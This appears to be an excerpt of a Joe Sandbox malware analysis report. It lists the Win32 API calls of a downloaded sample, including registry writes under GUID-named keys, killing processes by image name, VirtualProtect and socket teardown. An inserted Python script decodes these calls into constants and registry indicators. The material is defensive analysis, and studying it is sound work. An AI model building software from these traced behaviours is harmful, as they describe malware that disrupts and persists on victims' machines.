                                                                                                            • Opcode Fuzzy Hash: 41ec70808b806e0bef5bb364e64e8a15a425dccdf746cbfe31f727b4487b94bb
                                                                                                            • Instruction Fuzzy Hash: 7D41C378A50208EFCB09DF94D984BDEBBB5FB48300F208559F915A7390D734AA85DF50
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000,?,0031720B,?), ref: 003174EB
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031720B,?), ref: 00317523
                                                                                                            • CloseHandle.KERNEL32(00000000,?,0031720B,?), ref: 00317543
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0031720B,?), ref: 0031755B
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 0031757A
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 003175A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 3200977696-2564639436
                                                                                                            • Opcode ID: 51ba4d8a9389051623d77876660668bcade1f5a542e3a8534609227fd4dfe0c7
                                                                                                            • Instruction ID: a8f13aa3fafdcad54987306c13baae0413b641be411556b343a4357972eefdd4
                                                                                                            • Opcode Fuzzy Hash: 51ba4d8a9389051623d77876660668bcade1f5a542e3a8534609227fd4dfe0c7
                                                                                                            • Instruction Fuzzy Hash: E83138B4A04209DFDB19CF94C888BAEB7B6FF48304F28C558E5196B390C375A985CF90
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0030E08F
                                                                                                            • OpenEventW.KERNEL32(00100002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 0030E0CA
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030E0DD
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0030E0E7
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030E0F3
                                                                                                            • closesocket.WS2_32(?), ref: 0030E0FD
                                                                                                              • Part of subcall function 0030B6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0030B701
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B70C
                                                                                                              • Part of subcall function 0030B6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0030B724
                                                                                                              • Part of subcall function 0030B6D0: __snwprintf.LIBCMT ref: 0030B74E
                                                                                                              • Part of subcall function 0030B6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0030B773
                                                                                                              • Part of subcall function 0030B6D0: GetLastError.KERNEL32 ref: 0030B77C
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B7FC
                                                                                                              • Part of subcall function 0030B6D0: LocalFree.KERNEL32(00000000), ref: 0030B806
                                                                                                            Strings
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 0030E0BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$CreateErrorEventFreeLast$AllocCloseDirectoryFileHandleOpen__snwprintfclosesocketsetsockoptshutdown
                                                                                                            • String ID: {DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 1062739783-1481857122
                                                                                                            • Opcode ID: e3295ba3ff9b17fb631bb8e124ad447e5026316ebb21e566e98e3353698ccd55
                                                                                                            • Instruction ID: 46d90ecaa5061944271bf984f5c4b27094a4a49e1a6518caff2cd0ac4b5226d6
                                                                                                            • Opcode Fuzzy Hash: e3295ba3ff9b17fb631bb8e124ad447e5026316ebb21e566e98e3353698ccd55
                                                                                                            • Instruction Fuzzy Hash: E7310871A00218AFDB25DFA4D859BAEBBB8FF48300F20862CE514A72D1D7B59944CF51
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304331
                                                                                                            • OpenEventW.KERNEL32(00000002,00000000,{DD700AA6-D197-4A4A-838A-B93EA96F236B}), ref: 00304383
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00304396
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003043A0
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 003043D8
                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 003043FB
                                                                                                            Strings
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 0030437A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseHandleObjectOpenResetSingleWait
                                                                                                            • String ID: {DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 1560999653-1481857122
                                                                                                            • Opcode ID: 84f5cf93102c9c0886f6885e1d7bc027412f0b41a7c58050790bb96692cbdd45
                                                                                                            • Instruction ID: 288c8815a466cd19d916c49a3b6541d213e0e0ce039721ae7327e48a9c942b88
                                                                                                            • Opcode Fuzzy Hash: 84f5cf93102c9c0886f6885e1d7bc027412f0b41a7c58050790bb96692cbdd45
                                                                                                            • Instruction Fuzzy Hash: 222160B4903314EBCB3BABA4E96D76C77BCA710305F221499E709961E0CB719AE0CB51
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(00337C00,00000000,00000000,00316B10,00371178,00316B10), ref: 00310023
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 00310034
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031005F
                                                                                                            • lstrlenW.KERNEL32(?), ref: 00310070
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0031007F
                                                                                                            • CoTaskMemFree.COMBASE(?), ref: 0031008E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                                                                                                            • String ID: %s\%s
                                                                                                            • API String ID: 1665550476-4073750446
                                                                                                            • Opcode ID: 48c411a6527b94fc456fc75216f1c75597d7e7b7f639493b1e09492a30806b2a
                                                                                                            • Instruction ID: 3f0afa88a0674d9690fa32084cd0f225f1ae785f0370cd100f413f9f3e93e5b0
                                                                                                            • Opcode Fuzzy Hash: 48c411a6527b94fc456fc75216f1c75597d7e7b7f639493b1e09492a30806b2a
                                                                                                            • Instruction Fuzzy Hash: 43014074A44208FBD729DFA4DC89FAE7BB9EF4C701F108464FA09D6280D6759AC0CB50
                                                                                                            APIs
                                                                                                            • __snwprintf.LIBCMT ref: 0030478F
                                                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 003047A7
                                                                                                            • RegSetValueExW.ADVAPI32(?,{108D3252-20F0-4C1B-940D-6ED5366D8FD3},00000000,00000003,?,?), ref: 003047CA
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 003047D8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenValue__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 2100281157-2357458413
                                                                                                            • Opcode ID: c49227faee6afd3bd9a63385d0a950275562a797dbfc5ea62f506580dee1dfac
                                                                                                            • Instruction ID: 6863cd0e0ace417721a0ac6b5bc0dc793741b8f0a03b3af6856a5f3c8da448b0
                                                                                                            • Opcode Fuzzy Hash: c49227faee6afd3bd9a63385d0a950275562a797dbfc5ea62f506580dee1dfac
                                                                                                            • Instruction Fuzzy Hash: 390162B5604208FBD722DBA4DC99FAE337CEB08B00F104554BA199A180E675DB40A7A1
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000208), ref: 00309E57
                                                                                                            • __snwprintf.LIBCMT ref: 00309E7C
                                                                                                            • RegGetValueW.ADVAPI32(80000001,?,{C3120582-398C-4F3B-A956-7E9F9DB9EF8E},00000002,00000000,00000000,00000208), ref: 00309EA8
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00309EC7
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 00309E6B
                                                                                                            • {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00309E97
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00309E66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFreeValue__snwprintf
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
                                                                                                            • API String ID: 3906065898-3858757917
                                                                                                            • Opcode ID: 3ff5ef62af59098bbe4ffae45720591b4503b5360bd15d942152390223d620ae
                                                                                                            • Instruction ID: cdbb84e4aee5d5d6df4d9b59dffd487d77a64ed40f8924ddfd743b63ff4df147
                                                                                                            • Opcode Fuzzy Hash: 3ff5ef62af59098bbe4ffae45720591b4503b5360bd15d942152390223d620ae
                                                                                                            • Instruction Fuzzy Hash: DD015E70A44208FBDB21DBA4DD4AFAEB7B8AB08700F204599B609A71C1D6B45F40DB91
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003024A4
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003024CC
                                                                                                            • lstrcmpiW.KERNEL32(?,-00372F28), ref: 0030251A
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0030253C
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0030255A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00302567
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0030257F
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00302591
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 1193533834-0
                                                                                                            • Opcode ID: af2a378b2d13210f92e96c9b081ae896423b10f12746aabbf9f4302172754b5f
                                                                                                            • Instruction ID: 0501261c074948cf1e808c96983da0f7b45bb767a50647cc8e6e16cd158145b6
                                                                                                            • Opcode Fuzzy Hash: af2a378b2d13210f92e96c9b081ae896423b10f12746aabbf9f4302172754b5f
                                                                                                            • Instruction Fuzzy Hash: FB21EC71911218DBDB35DF60DD9CBAABBB8FB45700F104698E509A61D0D7749AC0DF50
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 0031E862
                                                                                                            • und_memcpy.LIBCMTD ref: 0031E888
                                                                                                            • und_memcpy.LIBCMTD ref: 0031E8A3
                                                                                                            • und_memcpy.LIBCMTD ref: 0031E8D7
                                                                                                            • VirtualProtect.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0031EAE5
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031EBAB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: und_memcpy$Local$AllocFreeProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3065580769-0
                                                                                                            • Opcode ID: ed291c51b19c91f21696e62e6d0bc671c3a24b8323aa921462d323f583373041
                                                                                                            • Instruction ID: 0959dd1f87c69df84d341fcdd68b8a95b37ccf0c882983e9d78f7432f14381a6
                                                                                                            • Opcode Fuzzy Hash: ed291c51b19c91f21696e62e6d0bc671c3a24b8323aa921462d323f583373041
                                                                                                            • Instruction Fuzzy Hash: 5BA1B170A05228CBDB6ACF04CD85BDAB7B5BB98305F1481D9D84DAB254D736AEC1CF80
                                                                                                            APIs
                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 003072DB
                                                                                                            • _memset.LIBCMT ref: 0030732B
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 00307595
                                                                                                            • closesocket.WS2_32(?), ref: 0030759F
                                                                                                              • Part of subcall function 00320CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale___crt_memsetclosesocketsetsockoptshutdown
                                                                                                            • String ID: $#
                                                                                                            • API String ID: 2801799075-2491617062
                                                                                                            • Opcode ID: 271ad7f5714bf85164f14a22e7530f9184655c4f4efc39c5058929d9b85f535c
                                                                                                            • Instruction ID: 48c969444cfc326f501b7403740e22a2c3ca24e4522a30c675990b03ec7aa692
                                                                                                            • Opcode Fuzzy Hash: 271ad7f5714bf85164f14a22e7530f9184655c4f4efc39c5058929d9b85f535c
                                                                                                            • Instruction Fuzzy Hash: E58116B0D0522DDBEB24DF40DC59BEEBBB5BB44304F2082E9D5486B281D7B65A88CF51
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00309164
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030919C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003091D2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00309222
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0030928C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: db41af8d911c59fcb974fd8868cecd6908ea9efa5762bec9534ad1f9fb9bfea6
                                                                                                            • Instruction ID: 5d6330020507bbaa9af0e9cd5572788480bc3f9e48b4da4ede71b4b81503c1b9
                                                                                                            • Opcode Fuzzy Hash: db41af8d911c59fcb974fd8868cecd6908ea9efa5762bec9534ad1f9fb9bfea6
                                                                                                            • Instruction Fuzzy Hash: 3A51A271A00508EBEB1ADFC4C9E8B6EB77AFB90305F108669D016AF6C2C735DA41CB41
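The function listings above give raw hex arguments (80000001, 00000003, 001FFFFF, 0000FFFF, 0000022C and so on) that an analyst has to translate by hand before the behaviour is obvious: the registry functions open HKEY_CURRENT_USER and write a REG_BINARY value or read a REG_SZ value into a 520-byte (MAX_PATH WCHAR) buffer under SOFTWARE\<GUID>; the Toolhelp32 loop compares each process image name with lstrcmpiW and opens a match with PROCESS_ALL_ACCESS before TerminateProcess; the socket function sets SO_LINGER at SOL_SOCKET, then calls shutdown(SD_BOTH) and closesocket. The script below is an added example, not Joe Sandbox code and not part of this report: it parses the "APIs" lines in the sandbox's own format (copied here from the registry-write, registry-read, process-kill and socket functions above, some listings excerpted), names the constants it recognises, tags each function with a coarse behaviour, and derives the registry paths worth hunting for on a host. Two assumptions are marked in the code: the {BB52E685-...} GUID is the %s of the SOFTWARE\%s format string only in the RegGetValueW function's Strings section, and the same subkey is assumed for the RegSetValueExW function; and arguments the sandbox shows as "?" (not recovered) are skipped rather than guessed. The 000000FF timeout shown for WaitForSingleObject is not decoded, since the report's rendering of that value is ambiguous.

```python
# Added example for this report (not Joe Sandbox code): decode the 'APIs' listings
# above into Win32 constants, behaviour tags and registry IOC paths. The sample
# listings are copied from the function blocks on this page (some excerpted).
import re
from dataclasses import dataclass

LINE_RE = re.compile(r"^\s*•\s*(?P<api>\w+)\.\w+"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
HKEYS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD"}
RRF_TYPES = {2: "RRF_RT_REG_SZ", 4: "RRF_RT_REG_EXPAND_SZ", 8: "RRF_RT_REG_BINARY", 16: "RRF_RT_REG_DWORD"}
# (api, argument index) -> symbolic name of that argument's value, when known
DECODERS = {
    ("RegOpenKeyW", 0): HKEYS.get,
    ("RegGetValueW", 0): HKEYS.get,
    ("RegSetValueExW", 3): REG_TYPES.get,
    ("RegGetValueW", 3): RRF_TYPES.get,
    ("RegGetValueW", 6): lambda v: "520 bytes = MAX_PATH WCHARs" if v == 0x208 else None,
    ("CreateToolhelp32Snapshot", 0): lambda v: "TH32CS_SNAPPROCESS" if v == 2 else None,
    ("Process32FirstW", 1): lambda v: "sizeof(PROCESSENTRY32W)" if v == 0x22C else None,
    ("OpenProcess", 0): lambda v: "PROCESS_ALL_ACCESS" if v == 0x1FFFFF else None,
    ("setsockopt", 1): lambda v: "SOL_SOCKET" if v == 0xFFFF else None,
    ("setsockopt", 2): lambda v: "SO_LINGER" if v == 0x80 else None,
    ("shutdown", 1): {0: "SD_RECEIVE", 1: "SD_SEND", 2: "SD_BOTH"}.get,
}

@dataclass
class Call:
    api: str
    args: list
    ref: str

def parse_block(text):
    """One 'APIs' listing -> Call records; lines that are not API calls are skipped."""
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        raw = m.group("args") or ""
        calls.append(Call(m.group("api"), [a.strip() for a in raw.split(",")] if raw else [], m.group("ref")))
    return calls

def decode(call):
    """{argument index: symbolic name} for the arguments DECODERS knows about."""
    out = {}
    for i, a in enumerate(call.args):
        fn = DECODERS.get((call.api, i))
        try:
            name = fn(int(a, 16)) if fn else None
        except ValueError:  # '?' or a string: the sandbox did not recover a number
            name = None
        if name:
            out[i] = name
    return out

def hive_of(calls):
    """Root key used by the first RegOpenKeyW/RegGetValueW in the function."""
    hives = [decode(c).get(0) for c in calls if c.api in ("RegOpenKeyW", "RegGetValueW")]
    return next((h for h in hives if h), "<hive?>")

def behaviours(calls):
    """Coarse behaviour tags from the set of APIs one function calls (order not checked)."""
    names, tags = {c.api for c in calls}, []
    if {"RegOpenKeyW", "RegSetValueExW"} <= names:
        tags.append(f"registry write under {hive_of(calls)}")
    if "RegGetValueW" in names:
        tags.append(f"registry read under {hive_of(calls)}")
    if {"CreateToolhelp32Snapshot", "lstrcmpiW", "OpenProcess", "TerminateProcess"} <= names:
        tags.append("kills a process chosen by image name")
    if {"setsockopt", "shutdown", "closesocket"} <= names:
        tags.append("socket teardown")
    return tags

def registry_iocs(calls, subkey):
    """HIVE\\SOFTWARE\\<subkey>\\<value> per registry access. 'subkey' fills the %s of the
    'SOFTWARE\\%s' format; the page shows that GUID only for the RegGetValueW function,
    so reusing it for the RegSetValueExW function is an assumption."""
    hive, iocs = hive_of(calls), []
    for c in calls:
        if c.api == "RegSetValueExW" and len(c.args) > 3:
            iocs.append(f"{hive}\\SOFTWARE\\{subkey}\\{c.args[1]} written as {decode(c).get(3, '?')}")
        elif c.api == "RegGetValueW" and len(c.args) > 3:
            iocs.append(f"{hive}\\SOFTWARE\\{subkey}\\{c.args[2]} read as {decode(c).get(3, '?')}")
    return iocs

SUBKEY = "{BB52E685-57DB-490D-A4DD-CCF2F7D90D58}"  # Strings section, xref 00309E66 (assumed for both functions)
SAMPLE_BLOCKS = {  # keyed by the first 'ref' address of each listing on this page
    "0030478F": """• __snwprintf.LIBCMT ref: 0030478F
• RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 003047A7
• RegSetValueExW.ADVAPI32(?,{108D3252-20F0-4C1B-940D-6ED5366D8FD3},00000000,00000003,?,?), ref: 003047CA
• RegCloseKey.ADVAPI32(?), ref: 003047D8""",
    "00309E57": """• LocalAlloc.KERNEL32(00000040,00000208), ref: 00309E57
• RegGetValueW.ADVAPI32(80000001,?,{C3120582-398C-4F3B-A956-7E9F9DB9EF8E},00000002,00000000,00000000,00000208), ref: 00309EA8
• LocalFree.KERNEL32(00000000), ref: 00309EC7""",
    "003024A4": """• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003024A4
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 003024CC
• lstrcmpiW.KERNEL32(?,-00372F28), ref: 0030251A
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0030253C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0030255A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0030257F""",
    "003072DB": """• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 003072DB
• shutdown.WS2_32(?,00000002), ref: 00307595
• closesocket.WS2_32(?), ref: 0030759F""",
}

if __name__ == "__main__":
    for ref, text in SAMPLE_BLOCKS.items():
        calls = parse_block(text)
        print(ref, behaviours(calls), registry_iocs(calls, SUBKEY), [decode(c) for c in calls])
```

The behaviour tags are deliberately coarse: they key on the set of APIs in one function, not on call order or on data flow between calls, so a tag is a prompt to open the function in the disassembly, not a verdict. The two derived paths, HKEY_CURRENT_USER\SOFTWARE\{BB52E685-57DB-490D-A4DD-CCF2F7D90D58} with the value names {108D3252-20F0-4C1B-940D-6ED5366D8FD3} (REG_BINARY) and {C3120582-398C-4F3B-A956-7E9F9DB9EF8E} (REG_SZ, up to MAX_PATH characters), are the host artefacts this section of the report supports; whether they hold configuration, an install path or a marker is not visible in the API trace alone.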
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00306932
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030696A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00306987
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003069D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Similarity
• API ID: CloseHandle$EventObjectSingleWait
• String ID: d
• API String ID: 2857295742-2564639436
APIs
• lstrcmpiW.KERNEL32(?,-00372F28,00000000,?,?,?,?,?), ref: 0030278C
• _memset.LIBCMT ref: 003027B1
• lstrcpyW.KERNEL32(?,-00372F28,?,?,?,?,?,?,?), ref: 003027CF
  • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
• lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00302815
  • Part of subcall function 00302A80: construct.LIBCPMTD ref: 00302B09
• StrCatW.SHLWAPI(00000000,00332714), ref: 00302863
